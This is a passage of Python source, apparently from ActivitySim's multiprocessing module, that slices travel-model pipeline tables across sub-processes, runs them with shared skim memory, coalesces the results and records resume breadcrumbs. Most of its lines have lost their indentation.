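        skims = np.frombuffer(raw_buffer, dtype=np.float64).reshape(shape)
        print(skims.sum())
    if __name__ == '__main__':
        shape = (4, 4)
        raw_buffer = multiprocessing.RawArray('d', int(np.prod(shape)))
        np.frombuffer(raw_buffer, dtype=np.float64)[:] = 1.0  # parent fills the shared data
        p = multiprocessing.Process(target=child, args=(raw_buffer, shape))
        p.start()
        p.join()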
read-write shared memory
There are a few circumstances in which the assumption of row independence breaks down.
This happens if the model must respect some aggregated resource or constraint such as school
enrollments or parking availability. In these cases, the individual choice models have to be
influenced or constrained in light of aggregate choices.
Currently school and workplace location choice are the only such aggregate constraints.
The details of these are handled by the shadow_pricing module (q.v.), and our only concern here
is the need to provide shared read-write data buffers for communication between processes.
It is worth noting here that the shared buffers are instances of multiprocessing.Array which
incorporates a multiprocessing.Lock object to mediate access to the underlying data. You might
think that the existence of such a lock would make shared access pretty straightforward, but
this is not the case as the level of locking is very low, reportedly not very performant, and
essentially useless in any event since we want to use numpy.frombuffer to wrap and handle them
as numpy arrays. The Lock is a convenient bundled locking primitive, but shadow_pricing rolls
its own semaphore system using the Lock.
FIXME - The code below knows that it needs to allocate skim and shadow price buffers by calling
the appropriate methods in abm.tables.skims and abm.tables.shadow_pricing to allocate shared
buffers. This is not very extensible and should be generalized.
"""
# FIXME - pathological knowledge of abm.tables.skims and abm.tables.shadow_pricing (see note above)
def log(msg, level, write_to_log_file=True):
process_name = multiprocessing.current_process().name
if not write_to_log_file:
print(f"############ mp_tasks - {process_name} - {msg}")
if write_to_log_file:
with config.open_log_file('mp_tasks_log.txt', 'a') as log_file:
print(f"mp_tasks - {process_name} - {msg}", file=log_file)
if write_to_log_file:
# logger.log(level, f"mp_tasks - {process_name} - {msg}")
logger.log(level, msg)
def debug(msg, write_to_log_file=True):
log(msg, level=logging.DEBUG, write_to_log_file=write_to_log_file)
def info(msg, write_to_log_file=True):
log(msg, level=logging.INFO, write_to_log_file=write_to_log_file)
def warning(msg, write_to_log_file=True):
log(msg, level=logging.WARNING, write_to_log_file=write_to_log_file)
def error(msg, write_to_log_file=True):
log(msg, level=logging.ERROR, write_to_log_file=write_to_log_file)
def exception(msg, write_to_log_file=True):
process_name = multiprocessing.current_process().name
if not write_to_log_file:
print(f"mp_tasks - {process_name} - {msg}")
print(f"---\n{traceback.format_exc()}---")
with config.open_log_file('mp_tasks_log.txt', 'a') as log_file:
print(f"---\nmp_tasks - {process_name} - {msg}", file=log_file)
traceback.print_exc(limit=10, file=log_file)
print("---", file=log_file)
if write_to_log_file:
logger.log(logging.ERROR, f"mp_tasks - {process_name} - {msg}")
logger.log(logging.ERROR, f"\n---\n{traceback.format_exc()}---\n")
"""
### child process methods (called within sub process)
"""
def pipeline_table_keys(pipeline_store):
"""
return dict of current (as of last checkpoint) pipeline tables
and their checkpoint-specific hdf5_keys
This facilitates reading pipeline tables directly from a 'raw' open pandas.HDFStore without
opening it as a pipeline (e.g. when apportioning and coalescing pipelines)
We currently only ever need to do this from the last checkpoint, so the ability to specify
checkpoint_name is not required, and thus omitted.
Parameters
----------
pipeline_store : open hdf5 pipeline_store
Returns
-------
checkpoint_name : name of the checkpoint
checkpoint_tables : dict {<table_name>: <table_key>}
"""
checkpoints = pipeline_store[pipeline.CHECKPOINT_TABLE_NAME]
# don't currently need this capability...
# if checkpoint_name:
# # specified checkpoint row as series
# i = checkpoints[checkpoints[pipeline.CHECKPOINT_NAME] == checkpoint_name].index[0]
# checkpoint = checkpoints.loc[i]
# else:
# last checkpoint row as series
checkpoint = checkpoints.iloc[-1]
checkpoint_name = checkpoint.loc[pipeline.CHECKPOINT_NAME]
# series with table name as index and checkpoint_name as value
checkpoint_tables = checkpoint[~checkpoint.index.isin(pipeline.NON_TABLE_COLUMNS)]
# omit dropped tables with empty checkpoint name
checkpoint_tables = checkpoint_tables[checkpoint_tables != '']
# hdf5 key is <table_name>/<checkpoint_name>
checkpoint_tables = {table_name: pipeline.pipeline_table_key(table_name, checkpoint_name)
for table_name, checkpoint_name in checkpoint_tables.items()}
# checkpoint name and series mapping table name to hdf5 key for tables in that checkpoint
return checkpoint_name, checkpoint_tables
def build_slice_rules(slice_info, pipeline_tables):
"""
based on slice_info for current step from run_list, generate a recipe for slicing
the tables in the pipeline (passed in tables parameter)
slice_info is a dict with two well-known keys:
'tables': required list of table names (order matters!)
'except': optional list of tables not to slice even if they have a sliceable index name
    Note: tables listed in slice_info must appear in the same order, and before any others, in the tables dict
The index of the first table in the 'tables' list is the primary_slicer.
Any other tables listed are dependent tables with either ref_cols to the primary_slicer
or with the same index (i.e. having an index with the same name). This cascades, so any
tables dependent on the primary_table can in turn have dependent tables that will be sliced
by index or ref_col.
    For instance, if the primary_slicer is households, then persons can be sliced because it
    has a ref_col to (a column with the same name as) the household table index. And the
    tours table can be sliced since it has a ref_col to persons. Tables can also be sliced
    by index. For instance the person_windows table can be sliced because it has an index with
    the same name as the persons table.
slice_info from multiprocess_steps
::
slice:
tables:
- households
- persons
tables from pipeline
+-----------------+--------------+---------------+
| Table Name | Index | ref_col |
+=================+==============+===============+
| households | household_id | |
+-----------------+--------------+---------------+
| persons | person_id | household_id |
+-----------------+--------------+---------------+
| person_windows | person_id | |
+-----------------+--------------+---------------+
| accessibility | zone_id | |
+-----------------+--------------+---------------+
generated slice_rules dict
::
households:
slice_by: primary <- primary table is sliced in num_processors-sized strides
persons:
source: households
slice_by: column
column: household_id <- slice by ref_col (foreign key) to households
person_windows:
source: persons
slice_by: index <- slice by index of persons table
accessibility:
slice_by: <- mirrored (non-dependent) tables don't get sliced
land_use:
slice_by:
Parameters
----------
slice_info : dict
'slice' info from run_list for this step
pipeline_tables : dict {<table_name>, <pandas.DataFrame>}
dict of all tables from the pipeline keyed by table name
Returns
-------
slice_rules : dict
"""
slicer_table_names = slice_info['tables']
slicer_table_exceptions = slice_info.get('except', [])
primary_slicer = slicer_table_names[0]
# - ensure that tables listed in slice_info appear in correct order and before any others
tables = OrderedDict([(table_name, None) for table_name in slicer_table_names])
for table_name in pipeline_tables.keys():
tables[table_name] = pipeline_tables[table_name]
if primary_slicer not in tables:
raise RuntimeError("primary slice table '%s' not in pipeline" % primary_slicer)
    # allow wildcard 'True' to avoid slicing (or coalescing) any tables not explicitly listed in slice_info.tables
    # populationsim uses slice.except wildcards to avoid listing control tables (etc) that should not be sliced,
    # followed by a slice.coalesce directive to explicitly list the omnibus tables created by the subprocesses.
    # So don't change this behavior without testing populationsim multiprocess!
if slicer_table_exceptions is True:
debug(f"slice.except wildcard (True): excluding all tables not explicitly listed in slice.tables")
slicer_table_exceptions = [t for t in tables if t not in slicer_table_names]
# dict mapping slicer table_name to index name
# (also presumed to be name of ref col name in referencing table)
slicer_ref_cols = OrderedDict()
if slicer_table_exceptions == '*':
slicer_table_exceptions = [t for t in tables if t not in slicer_table_names]
# build slice rules for loaded tables
slice_rules = OrderedDict()
for table_name, df in tables.items():
rule = {}
if table_name == primary_slicer:
# slice primary apportion table
rule = {'slice_by': 'primary'}
elif table_name in slicer_table_exceptions:
rule['slice_by'] = None
else:
for slicer_table_name in slicer_ref_cols:
if df.index.name is not None and (df.index.name == tables[slicer_table_name].index.name):
# slice df with same index name as a known slicer
rule = {'slice_by': 'index', 'source': slicer_table_name}
else:
# if df has a column with same name as the ref_col (index) of a slicer?
try:
source, ref_col = next((t, c)
for t, c in slicer_ref_cols.items()
if c in df.columns)
# then we can use that table to slice this df
rule = {'slice_by': 'column',
'column': ref_col,
'source': source}
except StopIteration:
rule['slice_by'] = None
if rule['slice_by']:
# cascade sliceability
slicer_ref_cols[table_name] = df.index.name
slice_rules[table_name] = rule
for table_name, rule in slice_rules.items():
if rule['slice_by'] is not None:
debug(f"### table_name: {table_name} slice_rules: {slice_rules[table_name]}")
debug(f"### slicer_ref_cols: {slicer_ref_cols}")
return slice_rules
def apportion_pipeline(sub_proc_names, step_info):
"""
apportion pipeline for multiprocessing step
create pipeline files for sub_procs, apportioning data based on slice_rules
Called at the beginning of a multiprocess step prior to launching the sub-processes
Pipeline files have well known names (pipeline file name prefixed by subjob name)
Parameters
----------
sub_proc_names : list of str
names of the sub processes to apportion
step_info : dict
step_info from multiprocess_steps for step we are apportioning pipeline tables for
Returns
-------
creates apportioned pipeline files for each sub job
"""
slice_info = step_info.get('slice', None)
multiprocess_step_name = step_info.get('name', None)
pipeline_file_name = inject.get_injectable('pipeline_file_name')
# ensure that if we are resuming, we don't apportion any tables from future model steps
last_checkpoint_in_previous_multiprocess_step = step_info.get('last_checkpoint_in_previous_multiprocess_step', None)
assert last_checkpoint_in_previous_multiprocess_step is not None
pipeline.open_pipeline(resume_after=last_checkpoint_in_previous_multiprocess_step)
# ensure all tables are in the pipeline
checkpointed_tables = pipeline.checkpointed_tables()
for table_name in slice_info['tables']:
if table_name not in checkpointed_tables:
raise RuntimeError(f"slicer table {table_name} not found in pipeline")
checkpoints_df = pipeline.get_checkpoints()
# for the subprocess pipelines, keep only the last row of checkpoints and patch the last checkpoint name
checkpoints_df = checkpoints_df.tail(1).copy()
# load all tables from pipeline
checkpoint_name = multiprocess_step_name
tables = {}
for table_name in checkpointed_tables:
# patch last checkpoint name for all tables
checkpoints_df[table_name] = checkpoint_name
# load the dataframe
tables[table_name] = pipeline.get_table(table_name)
debug(f"loaded table {table_name} {tables[table_name].shape}")
pipeline.close_pipeline()
# should only be one checkpoint (named <multiprocess_step_name>)
assert len(checkpoints_df) == 1
# - build slice rules for loaded tables
slice_rules = build_slice_rules(slice_info, tables)
# - allocate sliced tables for each sub_proc
num_sub_procs = len(sub_proc_names)
for i in range(num_sub_procs):
# use well-known pipeline file name
process_name = sub_proc_names[i]
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=process_name)
# remove existing file
try:
os.unlink(pipeline_path)
except OSError:
pass
with pd.HDFStore(pipeline_path, mode='a') as pipeline_store:
# remember sliced_tables so we can cascade slicing to other tables
sliced_tables = {}
# - for each table in pipeline
for table_name, rule in slice_rules.items():
df = tables[table_name]
if rule['slice_by'] is not None and num_sub_procs > len(df):
# almost certainly a configuration error
raise RuntimeError(f"apportion_pipeline: multiprocess step {multiprocess_step_name} "
f"slice table {table_name} has fewer rows {df.shape} "
f"than num_processes ({num_sub_procs}).")
if rule['slice_by'] == 'primary':
# slice primary apportion table by num_sub_procs strides
# this hopefully yields a more random distribution
# (e.g.) households are ordered by size in input store
# we are assuming that the primary table index is unique
# otherwise we should slice by strides in df.index.unique
# we could easily work around this, but it seems likely this was an error on the user's part
assert not df.index.duplicated().any()
primary_df = df[np.asanyarray(list(range(df.shape[0]))) % num_sub_procs == i]
sliced_tables[table_name] = primary_df
elif rule['slice_by'] == 'index':
# slice a table with same index name as a known slicer
source_df = sliced_tables[rule['source']]
sliced_tables[table_name] = df.loc[source_df.index]
elif rule['slice_by'] == 'column':
# slice a table with a recognized slicer_column
source_df = sliced_tables[rule['source']]
sliced_tables[table_name] = df[df[rule['column']].isin(source_df.index)]
elif rule['slice_by'] is None:
# don't slice mirrored tables
sliced_tables[table_name] = df
else:
raise RuntimeError("Unrecognized slice rule '%s' for table %s" %
(rule['slice_by'], table_name))
# - write table to pipeline
hdf5_key = pipeline.pipeline_table_key(table_name, checkpoint_name)
pipeline_store[hdf5_key] = sliced_tables[table_name]
debug(f"writing checkpoints ({checkpoints_df.shape}) "
f"to {pipeline.CHECKPOINT_TABLE_NAME} in {pipeline_path}")
pipeline_store[pipeline.CHECKPOINT_TABLE_NAME] = checkpoints_df
def coalesce_pipelines(sub_proc_names, slice_info):
"""
Coalesce the data in the sub_processes apportioned pipelines back into a single pipeline
We use slice_rules to distinguish sliced (apportioned) tables from mirrored tables.
Sliced tables are concatenated to create a single omnibus table with data from all sub_procs
but mirrored tables are the same across all sub_procs, so we can grab a copy from any pipeline.
Parameters
----------
sub_proc_names : list of str
slice_info : dict
slice_info from multiprocess_steps
Returns
-------
creates an omnibus pipeline with coalesced data from individual sub_proc pipelines
"""
pipeline_file_name = inject.get_injectable('pipeline_file_name')
debug(f"coalesce_pipelines to: {pipeline_file_name}")
# - read all tables from first process pipeline
# FIXME - note: assumes any new tables will be present in ALL subprocess pipelines
tables = {}
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=sub_proc_names[0])
with pd.HDFStore(pipeline_path, mode='r') as pipeline_store:
# hdf5_keys is a dict mapping table_name to pipeline hdf5_key
checkpoint_name, hdf5_keys = pipeline_table_keys(pipeline_store)
for table_name, hdf5_key in hdf5_keys.items():
debug(f"loading table {table_name} {hdf5_key}")
tables[table_name] = pipeline_store[hdf5_key]
# slice.coalesce is an override list of omnibus tables created by subprocesses that should be coalesced,
    # whether or not they satisfy the slice rules. Ordinarily, all tables that qualify for slicing by the slice rules
# will be coalesced, including any new tables created by the subprocess that have sliceable indexes or ref_cols.
# Any other new tables that don't match the slice rules will be considered mirrored. This is usually the desired
# behavior, especially in activitysim abm models. However, if the "slice.except: True" wildcard is used, it
# prevents the inference for newly generated tables, and this directive permits explicit specification of
    # which new tables to coalesce. Populationsim uses this wildcard except directive to avoid having to list
    # many slice exceptions, and just lists the weight tables to coalesce. So don't change this behavior without testing
# populationsim multiprocessing!
coalesce_tables = slice_info.get('coalesce', [])
# report absence of any slice_info.coalesce tables not in pipeline
# we don't require their presence in case there are tracing tables that will only be present if tracing is enabled
for table_name in coalesce_tables:
if table_name not in tables:
logger.warning("slicer coalesce.table %s not found in pipeline" % table_name)
# - use slice rules followed by apportion_pipeline to identify mirrored tables
# (tables that are identical in every pipeline and so don't need to be concatenated)
slice_rules = build_slice_rules(slice_info, tables)
# table is mirrored if no slice rule or explicitly listed in slice_info.coalesce setting
mirrored_table_names = \
[t for t, rule in slice_rules.items() if rule['slice_by'] is None and t not in coalesce_tables]
mirrored_tables = {t: tables[t] for t in mirrored_table_names}
omnibus_keys = {t: k for t, k in hdf5_keys.items() if t not in mirrored_table_names}
debug(f"coalesce_pipelines to: {pipeline_file_name}")
debug(f"mirrored_table_names: {mirrored_table_names}")
debug(f"omnibus_keys: {omnibus_keys}")
# assemble lists of omnibus tables from all sub_processes
omnibus_tables = {table_name: [] for table_name in omnibus_keys}
for process_name in sub_proc_names:
pipeline_path = config.build_output_file_path(pipeline_file_name, use_prefix=process_name)
logger.info(f"coalesce pipeline {pipeline_path}")
with pd.HDFStore(pipeline_path, mode='r') as pipeline_store:
for table_name, hdf5_key in omnibus_keys.items():
omnibus_tables[table_name].append(pipeline_store[hdf5_key])
# open pipeline, preserving existing checkpoints (so resume_after will work for prior steps)
pipeline.open_pipeline('_')
# - add mirrored tables to pipeline
for table_name in mirrored_tables:
df = mirrored_tables[table_name]
info(f"adding mirrored table {table_name} {df.shape}")
pipeline.replace_table(table_name, df)
# - concatenate omnibus tables and add them to pipeline
for table_name in omnibus_tables:
df = pd.concat(omnibus_tables[table_name], sort=False)
info(f"adding omnibus table {table_name} {df.shape}")
pipeline.replace_table(table_name, df)
pipeline.add_checkpoint(checkpoint_name)
pipeline.close_pipeline()
def setup_injectables_and_logging(injectables, locutor=True):
"""
Setup injectables (passed by parent process) within sub process
    We sometimes want only one of the sub-processes to perform an action (e.g. write shadow prices);
    the locutor flag indicates that this sub-process is the designated singleton spokesperson.
Parameters
----------
injectables : dict {<injectable_name>: <value>}
dict of injectables passed by parent process
locutor : bool
is this sub process the designated spokesperson
Returns
-------
injects injectables
"""
# register abm steps and other abm-specific injectables
# by default, assume we are running activitysim.abm
    # other callers (e.g. populationsim) will have to arrange to register their own steps and injectables
# (presumably) in a custom run_simulation.py instead of using the 'activitysim run' command
if not inject.is_injectable('preload_injectables'):
from activitysim import abm # register abm steps and other abm-specific injectables
try:
for k, v in injectables.items():
inject.add_injectable(k, v)
inject.add_injectable('is_sub_task', True)
inject.add_injectable('locutor', locutor)
config.filter_warnings()
process_name = multiprocessing.current_process().name
inject.add_injectable("log_file_prefix", process_name)
except Exception as e:
exception(f"{type(e).__name__} exception while setting up injectables: {str(e)}", write_to_log_file=False)
raise e
try:
tracing.config_logger()
except Exception as e:
exception(f"{type(e).__name__} exception while configuring logger: {str(e)}")
raise e
def adjust_chunk_size_for_shared_memory(chunk_size, data_buffers, num_processes):
# even if there is only one subprocess,
# we are separate from parent who allocated the shared memory
# so we still need to compensate for it
if chunk_size == 0:
return chunk_size
shared_memory_size = mem.shared_memory_size(data_buffers)
if shared_memory_size == 0:
return chunk_size
fair_share_of_shared_memory = int(shared_memory_size / num_processes)
adjusted_chunk_size = chunk_size - fair_share_of_shared_memory
logger.info(f"adjust_chunk_size_for_shared_memory "
f"adjusted_chunk_size {util.INT(adjusted_chunk_size)} "
f"chunk_size {util.INT(chunk_size)} "
f"shared_memory_size {util.INT(shared_memory_size)} "
f"num_processes {num_processes} "
f"fair_share_of_shared_memory {util.INT(fair_share_of_shared_memory)} ")
if adjusted_chunk_size <= 0:
raise RuntimeError(f"adjust_chunk_size_for_shared_memory: chunk_size too small for shared memory. "
f"adjusted_chunk_size: {adjusted_chunk_size}")
return adjusted_chunk_size
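# Illustrative arithmetic for the adjustment above (hypothetical byte counts, not defaults):
# with chunk_size = 1_000_000_000, shared buffers totalling 600_000_000 bytes and
# num_processes = 3, each sub-process gives up int(600_000_000 / 3) == 200_000_000 bytes,
# so adjust_chunk_size_for_shared_memory(1_000_000_000, data_buffers, 3) returns 800_000_000.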
def run_simulation(queue, step_info, resume_after, shared_data_buffer):
"""
run step models as subtask
called once to run each individual sub process in multiprocess step
Unless actually resuming, resume_after will be None for the first step,
and then FINAL for subsequent steps so pipelines are opened to resume where the previous step left off
Parameters
----------
queue : multiprocessing.Queue
step_info : dict
step_info for current step from multiprocess_steps
resume_after : str or None
shared_data_buffer : dict
dict of shared data (e.g. skims and shadow_pricing)
"""
# step_label = step_info['name']
models = step_info['models']
chunk_size = step_info['chunk_size']
num_processes = step_info['num_processes']
chunk_size = adjust_chunk_size_for_shared_memory(chunk_size, shared_data_buffer, num_processes)
inject.add_injectable('data_buffers', shared_data_buffer)
inject.add_injectable("chunk_size", chunk_size)
inject.add_injectable("num_processes", num_processes)
if resume_after:
info(f"resume_after {resume_after}")
# if they specified a resume_after model, check to make sure it is checkpointed
if resume_after != LAST_CHECKPOINT and \
resume_after not in pipeline.get_checkpoints()[pipeline.CHECKPOINT_NAME].values:
# if not checkpointed, then fall back to last checkpoint
info(f"resume_after checkpoint '{resume_after}' not in pipeline.")
resume_after = LAST_CHECKPOINT
pipeline.open_pipeline(resume_after)
last_checkpoint = pipeline.last_checkpoint()
if last_checkpoint in models:
info(f"Resuming model run list after {last_checkpoint}")
models = models[models.index(last_checkpoint) + 1:]
assert inject.get_injectable('preload_injectables', None)
t0 = tracing.print_elapsed_time()
for model in models:
t1 = tracing.print_elapsed_time()
try:
pipeline.run_model(model)
except Exception as e:
warning(f"{type(e).__name__} exception running {model} model: {str(e)}")
raise e
tracing.log_runtime(model_name=model, start_time=t1)
queue.put({'model': model, 'time': time.time()-t1})
tracing.print_elapsed_time("run (%s models)" % len(models), t0)
# add checkpoint with final tables even if not intermediate checkpointing
checkpoint_name = step_info['name']
pipeline.add_checkpoint(checkpoint_name)
pipeline.close_pipeline()
"""
### multiprocessing sub-process entry points
"""
def mp_run_simulation(locutor, queue, injectables, step_info, resume_after, **kwargs):
"""
mp entry point for run_simulation
Parameters
----------
locutor
queue
injectables
step_info
resume_after : str or None
kwargs : dict
shared_data_buffers passed as kwargs to avoid pickling the dict
"""
setup_injectables_and_logging(injectables, locutor=locutor)
debug(f"mp_run_simulation {step_info['name']} locutor={inject.get_injectable('locutor', False)} ")
try:
if step_info['num_processes'] > 1:
pipeline_prefix = multiprocessing.current_process().name
logger.debug(f"injecting pipeline_file_prefix '{pipeline_prefix}'")
inject.add_injectable("pipeline_file_prefix", pipeline_prefix)
shared_data_buffer = kwargs
run_simulation(queue, step_info, resume_after, shared_data_buffer)
mem.log_global_hwm() # subprocess
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_run_simulation: {str(e)}")
raise e
def mp_apportion_pipeline(injectables, sub_proc_names, step_info):
"""
mp entry point for apportion_pipeline
Parameters
----------
injectables : dict
injectables from parent
sub_proc_names : list of str
names of the sub processes to apportion
step_info : dict
step_info for multiprocess_step we are apportioning
"""
setup_injectables_and_logging(injectables)
try:
apportion_pipeline(sub_proc_names, step_info)
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_apportion_pipeline: {str(e)}")
raise e
def mp_setup_skims(injectables, **kwargs):
"""
Sub process to load skim data into shared_data
There is no particular necessity to perform this in a sub process instead of the parent
except to ensure that this heavyweight task has no side-effects (e.g. loading injectables)
Parameters
----------
injectables : dict
injectables from parent
kwargs : dict
shared_data_buffers passed as kwargs to avoid pickling the dict
"""
setup_injectables_and_logging(injectables)
info("mp_setup_skims")
try:
shared_data_buffer = kwargs
network_los_preload = inject.get_injectable('network_los_preload', None)
if network_los_preload is not None:
network_los_preload.load_shared_data(shared_data_buffer)
except Exception as e:
exception(f"{type(e).__name__} exception caught in mp_setup_skims: {str(e)}")
raise e
def mp_coalesce_pipelines(injectables, sub_proc_names, slice_info):
"""
mp entry point for coalesce_pipeline
Parameters
----------
injectables : dict
injectables from parent
sub_proc_names : list of str
names of the sub processes to apportion
slice_info : dict
slice_info from multiprocess_steps
"""
setup_injectables_and_logging(injectables)
try:
coalesce_pipelines(sub_proc_names, slice_info)
except Exception as e:
exception(f"{type(e).__name__} exception caught in coalesce_pipelines: {str(e)}")
raise e
"""
### main (parent) process methods
"""
def allocate_shared_skim_buffers():
"""
This is called by the main process to allocate shared memory buffer to share with subprocs
Note: Buffers must be allocated BEFORE network_los.load_data
Returns
-------
skim_buffers : dict {<skim_tag>: <multiprocessing.RawArray>}
"""
info("allocate_shared_skim_buffer")
network_los = inject.get_injectable('network_los_preload', None)
if network_los is not None:
skim_buffers = network_los.allocate_shared_skim_buffers()
else:
skim_buffers = {}
return skim_buffers
def allocate_shared_shadow_pricing_buffers():
"""
This is called by the main process to allocate memory buffer to share with subprocs
Returns
-------
multiprocessing.RawArray
"""
info("allocate_shared_shadow_pricing_buffers")
shadow_pricing_info = inject.get_injectable('shadow_pricing_info', None)
if shadow_pricing_info is not None:
from activitysim.abm.tables import shadow_pricing
shadow_pricing_buffers = shadow_pricing.buffers_for_shadow_pricing(shadow_pricing_info)
else:
shadow_pricing_buffers = {}
return shadow_pricing_buffers
def run_sub_simulations(
injectables,
shared_data_buffers,
step_info, process_names,
resume_after, previously_completed, fail_fast):
"""
Launch sub processes to run models in step according to specification in step_info.
If resume_after is LAST_CHECKPOINT, then pick up where previous run left off, using breadcrumbs
from previous run. If some sub-processes completed in the prior run, then skip rerunning them.
If resume_after specifies a checkpoint, skip checkpoints that precede the resume_after checkpoint
Drop 'completed' breadcrumbs for this run as sub-processes terminate
Wait for all sub-processes to terminate and return list of those that completed successfully.
Parameters
----------
injectables : dict
values to inject in subprocesses
shared_data_buffers : dict
dict of shared_data for sub-processes (e.g. skim and shadow pricing data)
step_info : dict
step_info from run_list
process_names : list of str
list of sub process names to run in parallel
resume_after : str or None
name of simulation to resume after, or LAST_CHECKPOINT to resume where previous run left off
previously_completed : list of str
names of processes that successfully completed in previous run
fail_fast : bool
whether to raise error if a sub process terminates with nonzero exitcode
Returns
-------
completed : list of str
names of sub_processes that completed successfully
"""
def log_queued_messages():
for process, queue in zip(procs, queues):
while not queue.empty():
msg = queue.get(block=False)
model_name = msg['model']
info(f"{process.name} {model_name} : {tracing.format_elapsed_time(msg['time'])}")
mem.trace_memory_info(f"{process.name}.{model_name}.completed")
def check_proc_status():
# drop 'completed' breadcrumb as soon as a sub-process finishes, lest we terminate before recording it
# if the fail_fast flag is set, raise as soon as any sub-process fails
for p in procs:
if p.exitcode is None:
pass # still running
elif p.exitcode == 0:
# completed successfully
if p.name not in completed:
info(f"process {p.name} completed")
completed.add(p.name)
drop_breadcrumb(step_name, 'completed', list(completed))
mem.trace_memory_info(f"{p.name}.completed")
else:
# process failed
if p.name not in failed:
warning(f"process {p.name} failed with exitcode {p.exitcode}")
failed.add(p.name)
mem.trace_memory_info(f"{p.name}.failed")
if fail_fast:
warning(f"fail_fast terminating remaining running processes")
for op in procs:
if op.exitcode is None:
try:
info(f"terminating process {op.name}")
op.terminate()
except Exception as e:
info(f"error terminating process {op.name}: {e}")
raise RuntimeError("Process %s failed" % (p.name,))
step_name = step_info['name']
t0 = tracing.print_elapsed_time()
info(f'run_sub_simulations step {step_name} models resume_after {resume_after}')
# if resuming and some processes completed successfully in previous run
if previously_completed:
assert resume_after is not None
assert set(previously_completed).issubset(set(process_names))
if resume_after == LAST_CHECKPOINT:
# if we are resuming where the previous run left off, then we can skip running
# any subprocedures that successfully completed in the previous run
process_names = [name for name in process_names if name not in previously_completed]
info(f'step {step_name}: skipping {len(previously_completed)} previously completed subprocedures')
else:
# if we are resuming after a specific model, then force all subprocesses to run
# (assuming if they specified a model, they really want everything after that to run)
previously_completed = []
# if not the first step, resume_after the last checkpoint from the previous step
if resume_after is None and step_info['step_num'] > 0:
resume_after = LAST_CHECKPOINT
num_simulations = len(process_names)
procs = []
queues = []
completed = set(previously_completed)
failed = set([]) # so we can log process failure first time it happens
drop_breadcrumb(step_name, 'completed', list(completed))
for i, process_name in enumerate(process_names):
q = multiprocessing.Queue()
locutor = (i == 0)
args = OrderedDict(locutor=locutor,
queue=q,
injectables=injectables,
step_info=step_info,
resume_after=resume_after)
# debug(f"create_process {process_name} target={mp_run_simulation}")
# for k in args:
# debug(f"create_process {process_name} arg {k}={args[k]}")
# for k in shared_data_buffers:
# debug(f"create_process {process_name} shared_data_buffers {k}={shared_data_buffers[k]}")
p = multiprocessing.Process(target=mp_run_simulation, name=process_name,
args=(locutor, q, injectables, step_info, resume_after,),
kwargs=shared_data_buffers)
procs.append(p)
queues.append(q)
# - start processes
for i, p in zip(list(range(num_simulations)), procs):
info(f"start process {p.name}")
p.start()
"""
windows mmap does not handle multiple simultaneous calls from different processes for the same tagname.
Process start causes a call to mmap to initialize the wrapper for the anonymous shared memory arrays
in the shared_data_buffers kwargs. Some of the processes fail with WinError 1450 (or a similar error)
OSError: [WinError 1450] Insufficient system resources exist to complete the requested service.
Judging by the commented-out assert, this (or a related) issue may have been around in some form for a while.
def __setstate__(self, state):
self.size, self.name = self._state = state
# Reopen existing mmap
self.buffer = mmap.mmap(-1, self.size, tagname=self.name)
# XXX Temporarily preventing buildbot failures while determining
# XXX the correct long-term fix. See issue 23060
#assert _winapi.GetLastError() == _winapi.ERROR_ALREADY_EXISTS
"""
if sys.platform == 'win32':
time.sleep(1)
mem.trace_memory_info(f"{p.name}.start")
while multiprocessing.active_children():
# log queued messages as they are received
log_queued_messages()
# monitor sub process status and drop breadcrumbs or fail_fast as they terminate
check_proc_status()
# monitor memory usage
mem.trace_memory_info("run_sub_simulations.idle", trace_ticks=mem.MEM_PARENT_TRACE_TICK_LEN)
time.sleep(1)
# clean up any messages or breadcrumbs that occurred while we slept
log_queued_messages()
check_proc_status()
# no need to join() explicitly since multiprocessing.active_children joins completed procs
for p in procs:
assert p.exitcode is not None
if p.exitcode:
error(f"Process %s failed with exitcode {p.exitcode}")
assert p.name in failed
else:
info(f"Process {p.name} completed with exitcode {p.exitcode}")
assert p.name in completed
t0 = tracing.print_elapsed_time('run_sub_simulations step %s' % step_name, t0)
return list(completed)
def run_sub_task(p):
"""
Run process p synchronously.
Return when the sub process terminates, or raise an error if its exitcode is nonzero
Parameters
----------
p : multiprocessing.Process
"""
info(f"#run_model running sub_process {p.name}")
mem.trace_memory_info(f"{p.name}.start")
t0 = tracing.print_elapsed_time()
p.start()
while multiprocessing.active_children():
mem.trace_memory_info("run_sub_simulations.idle", trace_ticks=mem.MEM_PARENT_TRACE_TICK_LEN)
time.sleep(1)
# no need to join explicitly since multiprocessing.active_children joins completed procs
# p.join()
t0 = tracing.print_elapsed_time('#run_model sub_process %s' % p.name, t0)
# info(f'{p.name}.exitcode = {p.exitcode}')
mem.trace_memory_info(f"run_model {p.name} completed")
if p.exitcode:
error(f"Process {p.name} returned exitcode {p.exitcode}")
raise RuntimeError("Process %s returned exitcode %s" % (p.name, p.exitcode))
def drop_breadcrumb(step_name, crumb, value=True):
"""
Add (crumb: value) to specified step in breadcrumbs and flush breadcrumbs to file
run can be resumed with resume_after
Breadcrumbs provides a record of steps that have been run for use when resuming
Basically, we want to know which steps have been run, which phases completed
(i.e. apportion, simulate, coalesce). For multi-processed simulate steps, we also
want to know which sub-processes completed successfully, because if resume_after
is LAST_CHECKPOINT we don't have to rerun the successful ones.
Parameters
----------
step_name : str
crumb : str
value : yaml-writable value
Returns
-------
"""
breadcrumbs = inject.get_injectable('breadcrumbs', OrderedDict())
breadcrumbs.setdefault(step_name, {'name': step_name})[crumb] = value
inject.add_injectable('breadcrumbs', breadcrumbs)
write_breadcrumbs(breadcrumbs)
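# Illustrative sketch (hypothetical step name): after
#     drop_breadcrumb('mp_households', 'apportion')
#     drop_breadcrumb('mp_households', 'completed', ['mp_households_0'])
# the injected breadcrumbs would be
#     OrderedDict([('mp_households',
#                   {'name': 'mp_households', 'apportion': True, 'completed': ['mp_households_0']})])
# and the same structure is flushed to the breadcrumbs file by write_breadcrumbs.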
def run_multiprocess(injectables):
"""
run the steps in run_list, possibly resuming after checkpoint specified by resume_after
we never open the pipeline since that is all done within multi-processing steps -
mp_apportion_pipeline, run_sub_simulations, mp_coalesce_pipelines -
each of which opens the pipeline/s and closes it/them within the sub-process
This 'feature' makes the pipeline state a bit opaque to us, for better or worse...
Steps may be either single or multi process.
For multi-process steps, we need to apportion pipelines before running sub processes
and coalesce them afterwards
injectables arg allows propagation of setting values that were overridden on the command line
(parent process command line arguments are not available to sub-processes in Windows)
